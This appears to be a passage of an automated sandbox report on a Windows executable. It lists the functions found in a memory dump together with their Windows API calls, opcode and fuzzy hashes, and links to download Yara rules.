Instruction Fuzzy Hash: 1A513775A00205DFCB00EFA8D884EADF7F4FF49310B15806AF919AB222DB31AD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A2E7DC, Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00A2E88A
GetPrivateProfileSectionW.KERNEL32 ref: 00A2E8B3
WritePrivateProfileSectionW.KERNEL32 ref: 00A2E8F2
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A2E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A2E91F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 3789f5a6e9537d176bbb392495d83075d2ded08ea79640d80fa57a272181b78a
Instruction ID: 52acd91a2661140c957d13333875a4ac5860a0a95776dbac48a3b38f227d6ad2
Opcode Fuzzy Hash: 3789f5a6e9537d176bbb392495d83075d2ded08ea79640d80fa57a272181b78a
Instruction Fuzzy Hash: 48514D39A00215DFCF01EF68C985EADBBF5EF48310B1480A9E849AB361CB31ED51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009F48B3, Relevance: 7.6, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009F4948
GetLastError.KERNEL32 ref: 009F4956
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 009F49A9
_strlen.LIBCMT ref: 009F49CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009F49E4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_strlen
String ID:
API String ID: 1602738612-0
Opcode ID: 24bd56e971600eceb2dd9e2e864c293b22a3f280262c999b3f80bcc5f0f92ca2
Instruction ID: 82b26afa05694917381c203bed02b01a4c64d65ebdcf2c11bd7998b1a1669737
Opcode Fuzzy Hash: 24bd56e971600eceb2dd9e2e864c293b22a3f280262c999b3f80bcc5f0f92ca2
Instruction Fuzzy Hash: DE41D47160025EAFDB219F69CC48BBF7BACEF42760F200655F699A7191DB708D80C761

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A2C5, Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce80fb37285f0d69c8b8699e32ea8b37488c8f613ad599373abbf03151fa724
Instruction ID: 6bb6d563fe664056c10012d690cc9ecd96c3229ac154672e3859c397a8abed02
Opcode Fuzzy Hash: dce80fb37285f0d69c8b8699e32ea8b37488c8f613ad599373abbf03151fa724
Instruction Fuzzy Hash: 8341153D980104AFD720DF68CC48FF9BB68EB96350F144125F85AAB2E0E770BD41DA51

Uniqueness

Uniqueness Score: -1.00%

Function 009C2344, Relevance: 7.6, APIs: 5, Instructions: 116keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009C2357
ScreenToClient.USER32 ref: 009C2374
GetAsyncKeyState.USER32(00000001), ref: 009C2399
GetAsyncKeyState.USER32(00000002), ref: 009C23A7

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 4ab7b1d1a9d2d193ae391befe82702207f5366a53ca8796cae8789f674be9c38
Instruction ID: a817c27e9cc80069ca7225632602ff199a2a7681be6fc9e5262cab850d41f23c
Opcode Fuzzy Hash: 4ab7b1d1a9d2d193ae391befe82702207f5366a53ca8796cae8789f674be9c38
Instruction Fuzzy Hash: 9441DF75908159FFDB159FA4CC44FEABB78FB46720F20831AF528A21D0C735A950DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A16920, Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00A1695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00A169A9
TranslateMessage.USER32(?), ref: 00A169D2
DispatchMessageW.USER32 ref: 00A169DC
PeekMessageW.USER32 ref: 00A169EB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: ffa9f134608ac305dd5099c4792852b432e708c83b7f5ac6dce937a1708d7d23
Instruction ID: 354846bd60a95303f728439ca9cd215b38c95d9e07b1584ecb68ae9b5209f439
Opcode Fuzzy Hash: ffa9f134608ac305dd5099c4792852b432e708c83b7f5ac6dce937a1708d7d23
Instruction Fuzzy Hash: F731E771900246AFEB20CFB4DC49FF6BBBCEB06344F1445A5E025D61A1E73598C6DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B405, Relevance: 7.6, APIs: 5, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

GetWindowLongW.USER32 ref: 00A4B44C
SetWindowLongW.USER32 ref: 00A4B471
SetWindowLongW.USER32 ref: 00A4B489
GetSystemMetrics.USER32 ref: 00A4B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A31184,00000000), ref: 00A4B4D0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 9fc715d8133d4e9c490d056ddaf4047499445365753034949de0fe0b055f3b3b
Instruction ID: 5b76ed4c850d53b24fddd4f10a8c8623759cb32aa41deb8859d90f25d5229192
Opcode Fuzzy Hash: 9fc715d8133d4e9c490d056ddaf4047499445365753034949de0fe0b055f3b3b
Instruction Fuzzy Hash: 0E21B239920265EFCB108F78DC04A693BA4FB85320F114738F966D31E1E731D811DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A35D60, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A35D81
GetForegroundWindow.USER32 ref: 00A35D98
GetDC.USER32 ref: 00A35DD4
GetPixel.GDI32(00000000,?,00000003), ref: 00A35DE0
ReleaseDC.USER32 ref: 00A35E1B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 797929c431599b659623da0b8d8c6e6acd8489624005597c7e286bd2ad16f9ab
Instruction ID: 8e03a350a786522d9a5e0fdc80109e46dfc5cc2fc9b6b490374bb74d708dbcfe
Opcode Fuzzy Hash: 797929c431599b659623da0b8d8c6e6acd8489624005597c7e286bd2ad16f9ab
Instruction Fuzzy Hash: B121A139A00104AFD714EFA9CD88FAAB7E5EF89300F058479F84A97261DA30AD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009C12F3, Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009C134D
SelectObject.GDI32(?,00000000), ref: 009C135C
BeginPath.GDI32(?), ref: 009C1373
SelectObject.GDI32(?,00000000), ref: 009C139C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: eb977dcfaa2c1822eabcb88d2dc3ecfad8189c36087cd86cecf9a8324eb23c41
Instruction ID: 1bdc4f9604081ff83a95a9326dc3cbddc13ed9f2b84f820c14d5dd46d545dcbe
Opcode Fuzzy Hash: eb977dcfaa2c1822eabcb88d2dc3ecfad8189c36087cd86cecf9a8324eb23c41
Instruction Fuzzy Hash: 42218671C00248EFEB11CFA5EC08BA93BBCFB42365F14821AF418964A1D3729992DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A17652, Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A1758C,80070057,00000000,00000000,?,00A1799D), ref: 00A1766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A1768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A17698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018), ref: 00A176A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A1758C,80070057,00000000,00000000), ref: 00A176B4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 8eec8ca52e963f8edc885d2cb59e8d3c62cde2310ca75deef7946f0fae347b87
Instruction ID: f9109207d00fecc77dced7075714e64f4ba9ceafed7344796a7fdc1b6d1d9f5a
Opcode Fuzzy Hash: 8eec8ca52e963f8edc885d2cb59e8d3c62cde2310ca75deef7946f0fae347b87
Instruction Fuzzy Hash: B5015EBA604108BFEB119F99ED44EAE7BBCEB85751F101029F904D6011D7329D8197B0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1874A, Relevance: 7.6, APIs: 5, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32 ref: 00A18766
GetLastError.KERNEL32(?,?,?,?,?), ref: 00A18770
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?), ref: 00A1877F
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00A18786
GetUserObjectSecurity.USER32 ref: 00A1879D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 0a0620bb41da13e5c741111e582e509e707e7197dd63185b6fd0d2392e97975c
Instruction ID: adf25a6a47968653ba3682c1c57395fe18e46f9845caffa744bb456e28f73b9c
Opcode Fuzzy Hash: 0a0620bb41da13e5c741111e582e509e707e7197dd63185b6fd0d2392e97975c
Instruction Fuzzy Hash: 17012C79200204BFDB109FA9DC48DABBBACEB863557240539F945C2160DA229C41CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A254E6, Relevance: 7.6, APIs: 5, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A25502
QueryPerformanceFrequency.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A25510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A25518
QueryPerformanceCounter.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A25522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A2555E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d378850a485b50e3925a87eef9ea2f06387b6dc80302d0eeeb23603a22befc2d
Instruction ID: 18951e977f65426fba05174839c1649d1e29a1703799b3214913c27997653ef6
Opcode Fuzzy Hash: d378850a485b50e3925a87eef9ea2f06387b6dc80302d0eeeb23603a22befc2d
Instruction Fuzzy Hash: E101173AD01929DBCF00EBF9EC899EDBB79FB4A352F010566E505B2140CB325655C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A185F1, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00A18D7D,00000000,?,?,00000000,00000000), ref: 00A18608
GetLastError.KERNEL32(?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18612
GetProcessHeap.KERNEL32(00000008,?,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18621
HeapAlloc.KERNEL32(00000000,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18628
GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977), ref: 00A1863E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1c53bcaa412a84e752e77d13d93d994a2cbb1c6336e68b7a4c5ca43e6ef9d3f9
Instruction ID: 7fc8b7168bd0a50afbce9e06bb075618eb132be05610f02858bf0725dd9ca1f5
Opcode Fuzzy Hash: 1c53bcaa412a84e752e77d13d93d994a2cbb1c6336e68b7a4c5ca43e6ef9d3f9
Instruction Fuzzy Hash: 40F03C39241204AFEB204FE8DC89DAA3FACEB86B55B504525F55586150DA665842CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A18652, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A18669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A18673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A18682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A18689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A1869F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f65ef1ec460bcd094d7f260d82e4f12052ed1ab804ed42bfc5629b856e1cd7ab
Instruction ID: 91c04a4b96d58be1aea21e083ed91bcef2b19c2c246861577484c46174268948
Opcode Fuzzy Hash: f65ef1ec460bcd094d7f260d82e4f12052ed1ab804ed42bfc5629b856e1cd7ab
Instruction Fuzzy Hash: 4BF0CD79200204BFEB205FE8EC88EAB3FACFFCA754B140535F558C6050DA229982DA70

Uniqueness

Uniqueness Score: -1.00%

Function 009E9D26, Relevance: 7.5, APIs: 5, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 009E9D26

Part of subcall function 009E33C7: RtlEncodePointer.NTDLL(00000000), ref: 009E33CA
Part of subcall function 009E33C7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009EA0E0
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009EA0F4
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009EA107
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009EA11A
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009EA12D
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009EA140
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009EA153
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009EA166
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009EA179
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009EA18C
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009EA19F
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009EA1B2
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009EA1C5
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009EA1D8
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009EA1EB
Part of subcall function 009E33C7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009EA1FE

__mtinitlocks.LIBCMT ref: 009E9D2B
__mtterm.LIBCMT ref: 009E9D34

Part of subcall function 009E9D9C: DeleteCriticalSection.KERNEL32(?,?,?,?,009E9D39,009E7F0D,00A7BD38,00000014), ref: 009E9E96
Part of subcall function 009E9D9C: _free.LIBCMT ref: 009E9E9D
Part of subcall function 009E9D9C: DeleteCriticalSection.KERNEL32(00A7FC00,?,?,009E9D39,009E7F0D,00A7BD38,00000014), ref: 009E9EBF

GetCurrentThreadId.KERNEL32 ref: 009E9D82

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__init_pointers__mtinitlocks__mtterm_free
String ID:
API String ID: 613900968-0
Opcode ID: fbd54f0a3ec742f0998463f2595bad681cc19ecbb236c7340b8e293c434e2a4f
Instruction ID: 9aa5c5485566d5bfe4c2725d5c8f0aa0d62521b20e5e08af0ed2b5a0af7d40ab
Opcode Fuzzy Hash: fbd54f0a3ec742f0998463f2595bad681cc19ecbb236c7340b8e293c434e2a4f
Instruction Fuzzy Hash: DBF0B4325197A22DE6377BBFBC0774A2A94DF81730F20473AF858D50E2EF519D8241A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C6A6, Relevance: 7.5, APIs: 5, Instructions: 44windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00A1C6BA
GetWindowTextW.USER32 ref: 00A1C6D1
MessageBeep.USER32(00000000), ref: 00A1C6E9
KillTimer.USER32(?,0000040A), ref: 00A1C705
EndDialog.USER32 ref: 00A1C71F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5a8a369f3793a5abf22659003d6d618447d8d02194b95702b450922a775e6429
Instruction ID: 8826aaee720502fd3e9a4131bf4ebd4709297ec93b19dce079a604f6c3dfbc51
Opcode Fuzzy Hash: 5a8a369f3793a5abf22659003d6d618447d8d02194b95702b450922a775e6429
Instruction Fuzzy Hash: 0F01A238540304AEEB219BA0ED4EFE7BB78FB02795F001559F186A08E0D7A26595CE50

Uniqueness

Uniqueness Score: -1.00%

Function 009F55C4, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009F55DA

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_free.LIBCMT ref: 009F55EC
_free.LIBCMT ref: 009F55FE
_free.LIBCMT ref: 009F5610
_free.LIBCMT ref: 009F5622

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8fe25a9db8d6bad45c0474337b8bccde3a19c5b420322f78b4e4a6d2e09b9308
Instruction ID: e76f51a0240f7d7c4c4b64cb426bba7b423868e1596ca9fe00458fc771680eed
Opcode Fuzzy Hash: 8fe25a9db8d6bad45c0474337b8bccde3a19c5b420322f78b4e4a6d2e09b9308
Instruction Fuzzy Hash: E0F03032509B44AFC661DBD5FC82E2A7BFEAA447527AA4C05F248EB510C730FC858B64

Uniqueness

Uniqueness Score: -1.00%

Function 009C13B0, Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009C13BF
StrokeAndFillPath.GDI32(?,?,009FBAD8,00000000,?), ref: 009C13DB
SelectObject.GDI32(?,00000000), ref: 009C13EE
DeleteObject.GDI32 ref: 009C1401
StrokePath.GDI32(?), ref: 009C141C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 5c9cf7cebf56a25736a1b32f8b4436136b15d0f75e1b6ab97f7517639b391994
Instruction ID: 9eaa41cea82d3d4e523c3b720ea71c9a709ac90c982b7de7d3424eeb5ea03df8
Opcode Fuzzy Hash: 5c9cf7cebf56a25736a1b32f8b4436136b15d0f75e1b6ab97f7517639b391994
Instruction Fuzzy Hash: 56F0CD38404248EFEB19DF96EC0CB543FA8AB82366F149229E429440F2D7364596DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C602, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A2C69D
CoCreateInstance.OLE32(00A52D6C,00000000,00000001,00A52BDC,?), ref: 00A2C6B5
CoUninitialize.OLE32 ref: 00A2C922

Strings

.lnk, xrefs: 00A2C631, 00A2C659, 00A2C663

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
